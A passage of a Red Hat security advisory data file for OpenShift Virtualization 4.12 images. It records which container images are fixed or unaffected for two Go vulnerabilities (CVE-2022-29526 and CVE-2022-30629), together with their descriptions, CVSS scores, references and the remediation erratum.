"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2084085", }, ], notes: [ { category: "description", text: "A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file's group, affecting system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: faccessat checks wrong group", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-29526", }, { category: "external", summary: "RHBZ#2084085", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2084085", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-29526", url: "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", url: "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, ], release_date: "2022-05-11T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 6.2, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: faccessat checks wrong group", }, { cve: "CVE-2022-30629", cwe: { id: "CWE-331", name: "Insufficient Entropy", }, discovery_date: "2022-06-02T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2092793", }, ], notes: [ { category: "description", text: "A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/tls: session tickets lack random ticket_age_add", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", 